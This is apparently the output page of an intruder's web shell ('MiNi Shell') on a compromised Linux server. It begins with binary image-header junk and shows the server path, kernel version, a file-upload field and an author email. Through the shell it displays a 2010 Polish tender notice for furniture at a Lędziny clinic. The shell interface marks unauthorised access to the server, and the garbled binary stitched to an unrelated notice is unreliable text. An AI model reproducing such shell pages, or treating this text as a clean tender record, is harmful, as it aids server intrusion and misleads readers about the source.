JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100728/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100728/201809-N-2010.html

<p class="kh_header"><b>Lędziny: DOSTAWA MEBLI DO GABINETÓW ZABIEGOWYCH 
I LEKARSKICH MIESZCZĄCYCH SIĘ W PRZYCHODNI SPECJALISTYCZNEJ W LĘDZINACH
 PRZY UL. POKOJU 17</b><br>
<b>Numer ogłoszenia: 201809 - 2010; data zamieszczenia: 28.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zespół Opieki Zdrowotnej , Asnyka 2, 43-140 Lędziny, woj. śląskie, tel. 032 2167701, faks 032 2167701.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MEBLI DO GABINETÓW ZABIEGOWYCH 
I LEKARSKICH MIESZCZĄCYCH SIĘ W PRZYCHODNI SPECJALISTYCZNEJ W LĘDZINACH
 PRZY UL. POKOJU 17.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje dostawę wymienionych w tabeli mebli
Załącznik nr 1
L.P.	SYMBOL	NAZWA	ILOŚĆ
1	BNP140	BIURKO NAROŻNE PRAWE 140	2
2	BNL140	BIURKO NAROŻNE LEWE 140	6
3	BNP160	BIURKO NAROŻNE PRAWE 160	3
4	BNL160	BIURKO NAROŻNE LEWE 160	2
5	BP140	BIURKO PROSTE 140	2
6	KSM	KONTENER STACJONARNY MAŁY	8
7	BKM	BLAT KONTENERA MAŁEGO	8
8	KSD	KONTENER STACJONARNY DUŻY	5
9	BKD	BLAT KONTENERA DUŻEGO	5
10	KMM	KONTENER MOBILNY MAŁY	2
11	KS 	KONTENER STACJONARNY  	1
12	ZPK	ZAWIESIE POD KOMPUTER	14
13	SPK	SZUFLADA POD KLAWIATURĘ	14
14	PW	PÓLKA WISZĄCA	3
15	PWZ	PÓLKA WISZĄCA ZAMYKANA	2
16	SUD	SZAFA UBRANIOWA DUŻA	11
17	SUM1	SZAFA UBRANIOWA MAŁA	9
18	SUM2	SZAFA UBRANIOWA MAŁA	1
19	SAZ180	SZAFA AKTOWA ZAMYKANA 180	1
20	SAZ110	SZAFA AKTOWA ZAMYKANA 110	2
21	SAK	SZAFA AKTOWA KOSZE	2
22	SN	SZAFKA NISKA	1
23	RNM	REGAŁ NAROŻNY MAŁY	1
24	RN 	REGAŁ NAROŻNY  	1
25	SO.	STOLIK OKOLICZNOŚCIOWY ?	1
26	SOC	STOLIK OKOLICZNOŚCIOWY  	1
27	SD	STOLIK DOSTAWKA	2
28	BN 	BLAT + NOGI	1
29	SD+B	SZAFKA DOLNA Z BLATEM	1
30	SG	SZAFKA GORNA	1
31	WNS	WIESZAK NA SCIANĘ	1
32	LPB	LADA PRZEDNIA BIURKA	1
33	RM1	REGAŁ METALOWY	2
34	RM2	REGAŁ METALOWY	2
35	RM3	REGAŁ METALOWY	1
36	ANEKS 1	ANEKS1	1
37	ANEKS 2	ANEKS2	1
38	ANEKS 3	ANEKS3	1
39	ANEKS 4	ANEKS 4	1
40	ANEKS 5	ANEKS 5	1
41	ANEKS 6	ANEKS 6	1
42	ANEKS 7	ANEKS 7	1
43	ANEKS 8	ANEKS 8	1
44	WWM	WIESZAK WOLNOSTOJĄCY METALOWY	20

       Załącznik nr 8  do specyfikacji zawierająca szczegółowy opis i wymiary poszczególnych elementów meblowych danych gabinetów ( specyfikacja techniczna ).
2.Wymagania szczegółowe do przedmiotu zamówienia:

poz. Od 1 do 13, 19,20,25,26,32,

2.1.  Opis wymaganych materiałów
Płyta wiórowa trójwarstwowa z wiórów drzewnych, łączona żywicą mocznikową obustronnie melaminowana, drewnopodobna w kolorze olcha, calvados, jasny buk grubości 28mm na blaty oraz 18mm na elementy korpusowe. Powierzchnia musi być pokryta żywicą melaminową  charakteryzującą się wysoką odpornością na ścieranie (użytkowanie), odpornością na zabrudzenia, czynniki chemiczne, wysoką temperaturę oraz odbarwienia zgodnie z normą PN EN 14322. Płyta melaminowana musi spełniać wysoką odporność na ścieranie oznaczana wg PN-EN 438-2:1997, p.5. Ścieranie oznaczane za pomocą szlifowania musi wynosić minimum 50 obrotów. Ponadto wg normy PN-93 F-06100 03 płyta musi odpowiadać co najmniej 4 stopniowi. Powierzchnia płyty musi być gładka bez struktury drewna. Płyta musi spełniać wymogi europejskiej klasy higieny E1, posiadać Atest Higieniczny Instytutu Medycyny Morskiej i Tropikalnej w Gdyni, Atest Higieniczny Wilhelm Klauditz Instytut oraz Certyfikat Coc. Jakość płyty musi być udokumentowana odpowiednimi certyfikatami producenta płyty o klasie higieny, zaświadczeniu o spełnianiu norm DIN EU 14323 oraz kartą wyrobu. Parametry używanej płyty należy udokumentować zaświadczeniem producenta o jej używaniu. Próbka
Taśma PCV musi wiernie odzwierciedlać kolor dekoru płyty melaminowanej. Na krawędzie narażone na bezpośrednie uderzenie (np. czoła szuflad, drzwi) należy zastosować obrzeże grubości nie mniejszej niż 2mm. Krawędzie obrzeża muszą być zaokrąglone promieniem R2. Na pozostałe krawędzie należy przykleić obrzeż grubości co najmniej 0,6mm. Jakość użytego obrzeża należy udokumentować zaświadczeniem od producenta o jego używaniu oraz przedłożyć certyfikaty higieniczny i jakościowy oraz kartę techniczną wyrobu wg dyrektywy 91 155 EWG i 93 112 EWG. Taśma PCV musi być przyklejona klejem charakteryzującym się  wysoką lepkością i bardzo wysoką odpornością termiczną z niewielką ilością wypełniacza gwarantującą uzyskanie bardzo cienkiej, estetycznej i trwałej spoiny klejowej. Np. klej DUDITERM 578 firm Durante&Vivan lub lepszy. Parametry używanego kleju należy udokumentować kartą techniczną oraz zaświadczeniem producenta o jego używaniu.
Złącza mimośrodowe metalowe z niklowaną częścią zaciskową fi 15 z trwale naniesioną nazwą producenta oraz  metalowo-tworzywową częścią rozprężną. Część dekoracyjna- niklowana eliminuje stosowanie odbiegających od koloru płyty zaślepek maskujących. Część rozprężna  gwarantująca trwałość połączenia oraz szybkość montażu i demontażu bez uszczerbku dla trwałości (sztywności) wyrobów. Jakość używanych złącz należy udokumentować kartą wyrobu.
Mocowania półek złożone z tworzywowej części osadzanej w półce z trwale naniesioną nazwą producenta oraz metalowo-tworzywowego trzpienia trwale mocowanego w korpusie szafy. Rozwiązanie to uniemożliwia przypadkowe wysunięcie półki z zawartością na użytkownika, zwiększa sztywność szafy oraz niweluje możliwość ugięcia półki gdyż całe obciążenie statyczne przeniesione zostaje na korpus szafy. Jakość używanych mocowań należy udokumentować kartą wyrobu.
Zamki patentowe w szafach oraz centralne w kontenerach muszą być wykonane z metalu z trwale umieszczoną nazwą producenta. Dwa numerowane klucze o zmienności kombinacji 1:10000 z których jeden jest wykonany z -łamanym -uchwytem gwarantującym bezpieczeństwo użytkowania (uniemożliwia przypadkowe złamanie klucza umieszczonego w zamku). 
Uchwyty meblowe wykonane z .metalu dwupunktowe o rozstawie nóżek 96 mm. Wysokość nóżki 26 mm co gwarantuje komfortowe otwieranie szuflad lub szaf.
Regulatory poziomowania- opis, norma. 
Prowadnice rolkowe metalowe samodomykające się  o dużej trwałości i nośności.

poz.36 do 43 dotyczy aneksów kuchennych

Meble kuchenne wyprodukowane z płyty wiórowej melaminowanej 
w klasie E1 gr 18mm oklejone obrzeżem PCV 0,5mm (korpusy),
 fronty oklejone obrzeżem PCV 2mm dobranym kolorystycznie 
do koloru frontu. Do łączenia elementów meblowych 
użyto kołków bukowych oraz mimośrodów firmy np. Titus.
W górnych szafkach kuchennych zastosowano zawieszki kuchenne 
regulowane w trzech osiach x, y, z.
Szafki górne posiadają dwie półki ruchome mocowane na
wspornikach spęcznanych o średednicy 5.
 Jako fronty w szafkach wiszących zastosowano ramki z profili aluminiowych 
prostokątnych R1 wypełnionych szybą 
o grubości 4mm - lakomat. W górnych szafkach zastosowano system 
otwierania zawiasy puszkowe o średnicy 35 z kątem otwarcia 110 °
Szafki kuchenne dolne wyprodukowane z płyty wiórowej melaminowanej 
w klasie E1 gr 18mm oklejone obrzeżem PCV 0,5mm (korpusy), 
fronty oklejone obrzeżem PCV 2mm dobranym kolorystycznie 
do koloru frontu. Do łączenia elementów meblowych użyto kołków 
bukowych oraz mimośrodów firmy np. Titus.
Szafki dolne na stopkach kuchennych o regulowanej wysokości
 w przedziale 100-150 mm. Cokolik meblowy jest mocowany na klipsie do 
stopki kuchennej zabezpieczony listwą uszczelniającą o profilu C. 
 Plecy w szafkach kuchennych wykonane są z płyty
HDF o gr. 3,0 mm..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie  spełnienia wyżej wymienionych warunków - Wykonawca dołączy do oferty oświadczenia wymienione w   § 6 SIWZ. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załącznikiem dokumentu potwierdzającego, że dostawy zostały wykonane należycie  (np. protokoły odbioru , referencje) - Załącznik Nr 5 do SIWZ -wykonanie z należytą starannością  minimum 2 dostaw z zakresu dostawy mebli o wartości min. 30 000,00 zł .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">atesty higieniczne na kleje, płyty, obrzeża.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmian postanowień umowy w następujących sytuacjach:
a) zmianę terminu realizacji  dostaw mebli i wyposażenia, asortymentu wskazanego w ofercie, jeżeli wynika ona z przyczyn niezawinionych przez Wykonawcę umowy,
b) zmianę podwykonawców, którym Wykonawca powierzył część zamówienia do wykonania.
2.	Powyższe zmiany dopuszczone będą wyłącznie pod warunkiem złożenia pisemnego wniosku.
3.	Wszystkie zmiany postanowień umowy mogą być dokonywane jedynie na piśmie pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ledziny.pl/bip/content/show.php?pg=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zespół Opieki Zdrowotnej 43-140 Lędziny ul. Asnyka 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2010 godzina 09:50, miejsce: Miejski Zespół Opieki Zdrowotnej 43-140 Lędziny ul. Asnyka 2 
( I piętro ) sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com